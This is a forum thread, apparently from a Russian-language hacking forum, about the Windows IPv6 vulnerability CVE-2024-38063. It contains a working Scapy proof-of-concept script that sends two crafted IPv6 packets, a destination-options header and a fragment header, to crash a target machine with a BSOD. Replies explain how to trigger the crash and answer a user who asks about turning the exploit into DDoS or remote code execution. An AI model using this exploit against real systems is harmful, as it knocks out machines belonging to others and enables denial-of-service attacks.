Remote CVE-2024-38063

Asting83 · 27.08.2024

https://github.com/ynwarcs/CVE-2024-38063

DarkToken · 27.08.2024

here is batter info about it LINK

mkhalilovx29 · 28.08.2024

Hi

here we have a poc that triaged BSOD with 2 packet not spray with lots of theme :

Github Repository For Pcap

Python POC:

Код:

from scapy.all import *

IPAddr = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX

ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()

sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

sxsnad · 28.08.2024

analysis:- https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html

KeyBit · 29.08.2024

Что в пакетах отправлять???

mkhalilovx29 · 30.08.2024

KeyBit сказал(а):

What should I send in the packages???

send packets with hop-by-hop and destination options headers

also use options header to discard the packet and notify to achieve the crash

KeyBit · 30.08.2024

mkhalilovx29 сказал(а):

send packets with hop-by-hop and destination options headers

also use options header to discard the packet and notify to achieve the crash

Я имею ввиду этот сплоит для Ddos или как его под RCE приспособить и полезную нагрузку отправить туда

mkhalilovx29 · 30.08.2024

KeyBit сказал(а):

I mean this exploit for Ddos or how to adapt it for RCE and send the payload there

its for Crash and dos system that receive the packets

for now , no RCE poc available on the net , and the techniques that i saw could not run any command based on how vulnerable code handle packets.
maybe the orginal author of vuln write something about getting RCE and method he used to prove the MSRC team the bug have RCE ability

Remote CVE-2024-38063

Asting83

floppy-диск

DarkToken

ripper

mkhalilovx29

ripper

sxsnad

CD-диск

KeyBit

RAID-массив

mkhalilovx29

ripper

KeyBit

RAID-массив

mkhalilovx29

ripper